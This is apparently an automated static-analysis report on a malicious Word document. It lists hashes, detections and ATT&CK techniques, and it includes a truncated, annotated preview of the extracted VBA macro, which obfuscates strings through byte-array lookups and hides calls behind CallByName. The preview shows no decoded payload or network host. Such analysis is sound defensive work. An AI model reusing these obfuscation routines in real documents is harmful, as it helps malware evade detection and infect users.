Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 8004601c08983420…

MALICIOUS

Office (OLE)

96.0 KB Created: 2018-09-24 11:06:00 Authoring application: Microsoft Office Word First seen: 2019-03-18
MD5: 471a89249fadd4bf0c28941ac29b6815 SHA-1: 9e1511d611eb1d11a2d61e232ca4b43220720cba SHA-256: 8004601c08983420408d2784e2a4aa79de426d41a09726a884edcb21f83ee7f8
162 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a malicious Office (Word) document containing VBA macros, flagged by a ClamAV signature (Doc.Malware.Valyria-9761059-0) and by high-severity static heuristics. The extracted macro wraps `CallByName` in an error-suppressed helper (`dim12`), a pattern used to invoke members of COM objects by name so that the method name never appears as a plain string; `GetObject` is reported by the heuristic but the call itself falls outside the truncated preview. The macro also assembles its strings at runtime: byte arrays such as `dim18(807)` are filled one index at a time in `dim93` from a lookup table (`dim64`), and `dim07` converts such an array to a string, stopping at the first zero byte — which is why plain string extraction recovers no URLs, paths or commands from this sample. The exact payload is therefore still obfuscated; runtime string construction combined with dynamic COM invocation is consistent with a downloader/dropper stage, but the second-stage delivery mechanism has not been confirmed statically, and recovering indicators requires either dynamic analysis or decoding `dim18` from the full `macros.bas`. The `macros.bas` artifact is the decoded VBA source extracted from the document.

Heuristics 5

  • ClamAV: Doc.Malware.Valyria-9761059-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Valyria-9761059-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • CallByName call high OLE_VBA_CALLBYNAME
    CallByName call
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body). This is the standard DrawingML XML namespace URI that Office writes into every document that contains drawing parts; it is not a network indicator and should not be treated as an IOC.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 28848 bytes
SHA-256: f2f750dd4ba27aa69a61c1a79afd0fe4033550eb29befb4f58018a7d40cc4a48
Preview script
First 1,000 lines of the extracted script (the preview below is cut off mid-routine; consult the full 28,848-byte artifact for the remainder of `dim93` and any code after it).
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "sub1, 0, 0, MSForms, Frame"
' Module header: the macro lives in the document's own ThisDocument module, and the
' VB_Control attribute declares an MSForms Frame control named "sub1" hosted by the
' document. Whether the macro reads data (e.g. a hidden payload) from that control is
' not shown in this preview -- confirm against the full macros.bas.
'
' Module-level state. dim99 is an untyped Variant; every other variable is a fixed-size
' Byte buffer. dim18 (indices 0..807, 808 bytes) is the largest and is filled one cell
' at a time in dim93 by indexing the dim64(1 To 255) lookup table. How dim64 itself is
' populated is not visible here -- TODO confirm from the full source.
Dim dim99, dim59(2) As Byte, dim43(9) As Byte, dim74(32) As Byte, dim62(19) As Byte, dim81(13) As Byte, dim5(5) As Byte, dim04(55) As Byte, dim18(807) As Byte, dim98(5) As Byte, dim86(19) As Byte, dim69(19) As Byte, dim64(1 To 255) As Byte
' Returns the highest index at which dim00 can be read: probes dim00(0), dim00(1), ...
' until an out-of-range (or other) error is raised, then returns the last index that
' succeeded. For a 0-based array this behaves like UBound without having to name the
' array's type. dim73 starts as Empty, which VBA treats as 0 in the arithmetic below.
' The Do loop has no exit condition -- the only way out is the error handler at dim75.
Private Function dim10(dim00)
On Error GoTo dim75
Dim dim73, dim91
Do
dim91 = dim00(dim73)    ' read is discarded; only the index at which it fails matters
dim73 = dim73 + 1
Loop
dim75:
dim10 = dim73 - 1       ' dim73 is one past the failing index when we land here
End Function
' Decodes a Byte array into a String: walks dim53 from index 0 up to dim79 inclusive,
' stops at the first zero byte (a C-style terminator), and appends dim71(byte) for every
' other byte. dim71 is not in this preview -- presumably a Chr-like byte-to-character
' conversion; confirm in the full source. Any runtime error (e.g. reading past the array
' bound when dim79 is too large) jumps to dim72 and the function returns whatever has
' been accumulated so far. This is the routine that turns the byte tables built in dim93
' into usable strings, so the decoded values never exist as literals in the macro.
Private Function dim07(dim53() As Byte, dim79)
Dim dim85, dim68
On Error GoTo dim72
While dim85 <= dim79    ' dim85 starts Empty (0)
dim68 = dim53(dim85)
If dim68 = 0 Then
Exit Function           ' zero byte terminates the string
End If
dim07 = dim07 & dim71(dim68)
dim68 = 0               ' dead store: dim68 is overwritten on the next iteration
dim85 = dim85 + 1
Wend
dim72:
End Function
' Error-suppressed wrapper around CallByName: invokes member dim31 on object dim8 with
' call type dim84 (the VbCallType value) and the single argument dim57, and returns the
' result as an object reference. dim65 and dim09 are accepted but never used -- possibly
' padding to make the signature harder to match. Because the member name is passed as
' data (dim31, typically produced by dim07), the called method never appears as a
' literal in the macro. If CallByName raises, the handler at dim9 swallows the error and
' dim12 is left unset (Nothing) for the caller to deal with.
Private Function dim12(dim8, dim31, dim84, dim65, dim57, dim09)
On Error GoTo dim9
Set dim12 = CallByName(dim8, dim31, dim84, dim57)
dim9:
End Function
Private Sub dim93()
dim18(669) = dim64(226)
dim18(58) = dim64(123)
dim18(629) = dim64(74)
dim18(350) = dim64(95)
dim18(106) = dim64(133)
dim18(631) = dim64(75)
dim18(150) = dim64(121)
dim18(301) = dim64(199)
dim18(185) = dim64(33)
dim18(192) = dim64(162)
dim18(658) = dim64(70)
dim18(769) = dim64(109)
dim18(86) = dim64(59)
dim18(343) = dim64(54)
dim18(677) = dim64(170)
dim18(91) = dim64(189)
dim18(136) = dim64(4)
dim18(386) = dim64(124)
dim18(205) = dim64(253)
dim18(639) = dim64(203)
dim18(241) = dim64(163)
dim18(484) = dim64(81)
dim18(761) = dim64(76)
dim18(506) = dim64(69)
dim18(308) = dim64(189)
dim18(745) = dim64(243)
dim18(480) = dim64(120)
dim18(550) = dim64(237)
dim18(777) = dim64(105)
dim18(507) = dim64(124)
dim18(604) = dim64(219)
dim18(751) = dim64(213)
dim18(644) = dim64(235)
dim18(79) = dim64(216)
dim18(363) = dim64(169)
dim18(533) = dim64(188)
dim18(97) = dim64(238)
dim18(732) = dim64(80)
dim18(534) = dim64(255)
dim18(693) = dim64(128)
dim18(359) = dim64(24)
dim18(23) = dim64(211)
dim18(462) = dim64(189)
dim18(61) = dim64(164)
dim18(730) = dim64(54)
dim18(746) = dim64(196)
dim18(103) = dim64(82)
dim18(680) = dim64(159)
dim18(504) = dim64(1)
dim18(581) = dim64(95)
dim18(221) = dim64(225)
dim18(666) = dim64(224)
dim18(181) = dim64(105)
dim18(133) = dim64(224)
dim18(420) = dim64(249)
dim18(570) = dim64(104)
dim18(40) = dim64(252)
dim18(499) = dim64(27)
dim18(193) = dim64(204)
dim18(370) = dim64(17)
dim18(224) = dim64(7)
dim18(203) = dim64(224)
dim18(202) = dim64(124)
dim18(605) = dim64(128)
dim18(487) = dim64(30)
dim18(653) = dim64(45)
dim18(464) = dim64(134)
dim18(358) = dim64(55)
dim18(380) = dim64(197)
dim18(508) = dim64(21)
dim18(475) = dim64(16)
dim18(696) = dim64(104)
dim18(198) = dim64(221)
dim18(161) = dim64(194)
dim18(602) = dim64(172)
dim18(393) = dim64(225)
dim18(710) = dim64(214)
dim18(590) = dim64(124)
dim18(649) = dim64(167)
dim18(371) = dim64(5)
dim18(729) = dim64(36)
dim18(452) = dim64(30)
dim18(805) = dim64(111)
dim18(449) = dim64(84)
dim18(238) = dim64(52)
dim18(547) = dim64(83)
dim18(170) = dim64(190)
dim18(681) = dim64(38)
dim18(99) = dim64(113)
dim18(672) = dim64(220)
dim18(11) = dim64(24)
dim18(85) = dim64(155)
dim18(735) = dim64(136)
dim18(149) = dim64(200)
dim18(770) = dim64(14)
dim18(351) = dim64(203)
dim18(105) = dim64(145)
dim18(460) = dim64(72)
dim18(575) = dim64(114)
dim18(134) = dim64(71)
dim18(583) = dim64(47)
dim18(611) = dim64(252)
dim18(7) = dim64(62)
dim18(539) = dim64(1)
dim18(614) = dim64(76)
dim18(736) = dim64(60)
dim18(369) = dim64(45)
dim18(73) = dim64(8)
dim18(595) = dim64(158)
dim18(718) = dim64(98)
dim18(94) = dim64(122)
dim18(179) = dim64(189)
dim18(298) = dim64(133)
dim18(527) = dim64(178)
dim18(195) = dim64(103)
dim18(721) = dim64(48)
dim18(470) = dim64(151)
dim18(448) = dim64(65)
dim18(763) = dim64(96)
dim18(768
... (truncated)